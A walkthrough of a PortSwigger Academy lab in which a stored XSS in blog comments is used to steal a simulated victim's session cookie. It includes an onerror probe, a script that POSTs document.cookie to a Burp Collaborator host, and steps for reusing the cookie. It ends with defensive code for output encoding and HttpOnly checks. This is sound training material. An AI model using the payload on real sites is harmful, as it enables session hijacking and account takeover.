Solving PortSwigger Academy: Exploiting cross-site scripting to steal cookies
This lab contains a stored XSS vulnerability in the blog comments function. A simulated victim user views all comments after they are posted. To solve the lab, exploit the vulnerability to exfiltrate the victim’s session cookie, then use this cookie to impersonate the victim.
So in this lab we need to steal the session cookie of the user and use it to log in.
As soon as you access the lab, you will notice the website with different blogs. We need to test if it is vulnerable to XSS first.
I clicked on a blog and saw a Comment function. I will first test the Comment field. Let’s first add <img src=x onerror=prompt()> in the field and fill the rest of the fields with necessary comments.
As soon as I visited the blog I saw a prompt, which indicates an XSS vulnerability.

Let’s now use a script to fetch the cookie; for that we need a collaborator. I will use the payload below.
<script>
  fetch('https://<SESSION>.burpcollaborator.net', {
    method: 'POST',
    mode: 'no-cors',
    body: document.cookie
  });
</script>
This is JavaScript, as you can see from the <script> tag. I then used the fetch method. You can read about the method here.

Start the collaborator, copy its ID into the script above and store the script in the comment section; you will see the data.


Now use this session cookie in the browser.
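The two conditions this lab depends on are that the comment is rendered without encoding and that the session cookie is readable through document.cookie. The following is an added example, not code from the lab or the original write-up, showing how a defender can check both; the helper names and the sample cookie values are assumptions constructed for illustration.

```javascript
// Added example: defensive checks for the stored XSS cookie theft described above.
// escapeHtml, renderComment and auditSetCookie are hypothetical helper names.

// Encode the HTML-significant characters before a comment is placed in the page.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Render a stored comment as inert text inside a paragraph element.
function renderComment(comment) {
  return '<p>' + escapeHtml(comment) + '</p>';
}

// Parse one Set-Cookie header value and report missing protective attributes.
function auditSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim());
  const name = parts[0].split('=')[0];
  const attrs = parts.slice(1).map((p) => p.split('=')[0].toLowerCase());
  const missing = [];
  // Without HttpOnly, page script can read the cookie via document.cookie.
  if (!attrs.includes('httponly')) missing.push('HttpOnly');
  if (!attrs.includes('secure')) missing.push('Secure');
  if (!attrs.includes('samesite')) missing.push('SameSite');
  return { name, missing, readableByScript: !attrs.includes('httponly') };
}

// Constructed sample inputs (not captured from the lab).
const probe = '<img src=x onerror=prompt()>';
const weakCookie = 'session=CONSTRUCTED_VALUE; Secure; SameSite=None';
const hardenedCookie = 'session=CONSTRUCTED_VALUE; Secure; HttpOnly; SameSite=Strict';

console.log(renderComment(probe));          // tag is shown as text, no handler runs
console.log(auditSetCookie(weakCookie));     // flags the missing HttpOnly attribute
console.log(auditSetCookie(hardenedCookie)); // nothing missing
```

With the comment encoded on output the probe is displayed as text, and with HttpOnly set the session value is not present in document.cookie even if a script does run.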

